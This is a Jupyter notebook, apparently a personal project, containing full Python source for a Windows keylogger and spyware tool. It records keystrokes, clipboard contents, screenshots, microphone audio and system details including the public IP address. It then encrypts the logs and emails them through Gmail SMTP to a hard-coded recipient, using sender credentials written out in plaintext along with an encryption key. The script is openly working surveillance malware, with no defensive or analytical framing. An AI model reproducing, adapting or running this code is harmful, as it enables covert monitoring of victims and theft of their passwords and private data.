In [1]:
#Libraries to be used
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import smtplib
import socket
import platform
import win32clipboard
from pynput.keyboard import Key, Listener
import time
import os
from scipy.io.wavfile import write
import sounddevice as sd
from cryptography.fernet import Fernet
import getpass
from requests import get
from multiprocessing import Process, freeze_support
from PIL import ImageGrab

In [2]:
# Default file names for storing information
keys_information = "key_log.txt"
system_information = "system_info.txt"
clipboard_information = "clipboard.txt"
audio_information = "audio.wav"
screenshot_information = "screenshot.png"

# Encrypted file names
keys_information_e = "e_key_log.txt"
system_information_e = "e_system_info.txt"
clipboard_information_e = "e_clipboard.txt"

# File paths
file_path = "C:\\Users\\lawan\\KeyLogger_Info"
extend = "\\"
file_merge = file_path + extend

# Email configuration
email_address = "vel2021.23@gmail.com"
password = "Aqwerty2123"
toaddr = "aditinu007@gmail.com"

# Configuration for audio recording
microphone_time = 10

# Time interval between data collection cycles
time_iteration = 15

# Number of data collection cycles
number_of_iterations_end = 1

# Encryption key
key = "B0-wVqAFlgSQ4Y_KE_vss6fpPAA8TWMbH-_cjjYEvOE="

# Counter and list for storing keystrokes
count = 0
keys = []

In [3]:
def send_email(filename, attachment, toaddr):
    # Sender's email address
    fromaddr = email_address
    
    # Create an email message
    msg = MIMEMultipart()
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = "Log File"
    
    # Set the body of the email
    body = "Body_of_the_mail"
    msg.attach(MIMEText(body, 'plain'))
    
    # Set the filename and attachment for the email
    filename = filename
    attachment = open(attachment, 'rb')
    
    # Create a MIMEBase object and set its payload
    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    
    # Encode the payload in base64
    encoders.encode_base64(p)
    
    # Add header with filename to the attachment
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    
    # Attach the payload to the email message
    msg.attach(p)
    
    # Set up the SMTP server and login
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    s.login(fromaddr, password)
    
    # Convert the message to a string and send the email
    text = msg.as_string()
    s.sendmail(fromaddr, toaddr, text)
    
    # Close the connection to the SMTP server
    s.quit()

In [4]:
# send_email(keys_information, file_path + extend + keys_information, toaddr)

In [5]:
def computer_information():
    """
    Collects and logs system information to a file.

    - Public IP address is retrieved using 'https://api.ipify.org'.
    - Processor, system, machine, hostname, and private IP address are logged.
    - Logs are appended to the existing system information file.
    """
    with open(file_merge + system_information, "a") as f:
        # Get the hostname of the machine
        hostname = socket.gethostname()

        # Get the private IP address of the machine
        IPAddr = socket.gethostbyname(hostname)

        try:
            # Try to get the public IP address using an external service
            public_ip = get("https://api.ipify.org").text
            f.write("Public IP Address: " + public_ip)
        except Exception:
            # Handle exceptions if public IP address retrieval fails
            f.write("Couldn't get IP Address")

        # Log processor information
        f.write("Processor: " + (platform.processor()) + '\n')

        # Log system information (e.g., Windows 10)
        f.write("System: " + platform.system() + " " + platform.version() + '\n')

        # Log machine architecture (e.g., x86_64)
        f.write("Machine: " + platform.machine() + '\n')

        # Log the hostname of the machine
        f.write("Hostname: " + hostname + '\n')

        # Log the private IP address of the machine
        f.write("Private IP Address: " + IPAddr + '\n')

In [6]:
# computer_infromation()

In [7]:
def copy_clipboard():
    """
    Copies clipboard data and logs it to a file.

    - Opens the clipboard to get the current data.
    - Writes the clipboard data to the specified file.
    - Handles exceptions if clipboard copying fails.
    """
    with open(file_merge + clipboard_information, "a") as f:
        try:
            # Open the clipboard to get the current data
            win32clipboard.OpenClipboard()

            # Get the clipboard data
            pasted_data = win32clipboard.GetClipboardData()

            # Close the clipboard
            win32clipboard.CloseClipboard()

            # Write the clipboard data to the file
            f.write("Clipboard Data: \n" + pasted_data)
        except Exception as e:
            # Handle exceptions if clipboard copying fails
            f.write("Clipboard cannot be copied. Error: " + str(e))

In [8]:
# copy_clipboard()

In [9]:
def microphone():
    """
    Records audio from the microphone and saves it to a file.

    - Defines the audio settings: sample rate (fs), duration (seconds), and channels.
    - Records audio using the specified settings.
    - Waits for the recording to complete.
    - Writes the recorded audio to the specified file.
    """
    # Audio settings
    fs = 44100  # Sample rate
    seconds = microphone_time  # Duration of recording
    channels = 2  # Number of audio channels (stereo)

    # Record audio using specified settings
    myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=channels)

    # Wait for the recording to complete
    sd.wait()

    # Save the recorded audio to the specified file
    write(file_merge + audio_information, fs, myrecording)

In [10]:
# microphone()

In [11]:
def screenshot():
    """
    Captures a screenshot and saves it to a file.

    - Uses the ImageGrab module to capture the current screen.
    - Saves the captured image to the specified file.
    """
    # Capture the current screen
    im = ImageGrab.grab()

    # Save the captured image to the specified file
    im.save(file_merge + screenshot_information)

In [12]:
# screenshot()

In [13]:
# Initialize iteration variables
number_of_iterations = 0
currentTime = time.time()
stoppingTime = time.time() + time_iteration

# Main loop for data collection iterations
while number_of_iterations < number_of_iterations_end:

    # Callback function when a key is pressed
    def on_press(key):
        global keys, count, currentTime
        keys.append(key)
        count += 1
        currentTime = time.time()
        if count > 1:
            count = 0
            write_file(keys)
            keys = []

    # Write collected keys to a file
    def write_file(keys):
        with open(file_merge + keys_information, "a") as f:
            for key in keys:
                k = str(key).replace("'", "")
                if k.find("space") > 0:
                    f.write('\n')
                elif k.find("Key") == -1:
                    f.write(k)
        f.close()

    # Callback function when a key is released
    def on_release(key):
        if key == Key.esc:
            return False
        if currentTime > stoppingTime:
            return False
    
    # Set up and start the listener
    with Listener(on_press=on_press, on_release=on_release) as listener:
        listener.join()
    
    # Check if it's time to stop and collect additional data
    if currentTime > stoppingTime:
        # Clear existing keys information file
        with open(file_merge + keys_information, "w") as f:
            f.write(" ")
        
        # Collect additional system information, screenshot, and clipboard data
        computer_information()
        screenshot()
        copy_clipboard()
        
        # Update iteration count and reset timing
        number_of_iterations += 1
        currentTime = time.time()
        stoppingTime = time.time() + time_iteration

In [14]:
# List of files to encrypt
files_to_encrypt = [
    file_merge + keys_information,
    file_merge + system_information,
    file_merge + clipboard_information
]

# List of encrypted file names
encrypted_file_names = [
    file_merge + keys_information_e,
    file_merge + system_information_e,
    file_merge + clipboard_information_e
]

In [15]:
# Initialize a counter
count = 0

# Iterate through files to encrypt
for encrypting_file in files_to_encrypt:
    # Read the content of the original file
    with open(files_to_encrypt[count], 'rb') as f:
        data = f.read()
    
    # Create a Fernet object for encryption
    fernet = Fernet(key)
    
    # Encrypt the data
    encrypted = fernet.encrypt(data)
    
    # Write the encrypted data to the corresponding file
    with open(encrypted_file_names[count], 'wb') as f:
        f.write(encrypted)
    
    # Send the encrypted file via email
    send_email(encrypted_file_names[count], encrypted_file_names[count], toaddr)
    
    # Increment the counter
    count += 1

# Pause the execution for 100 seconds
time.sleep(100)

<h3>Aditya Dadasaheb Lawand</h3>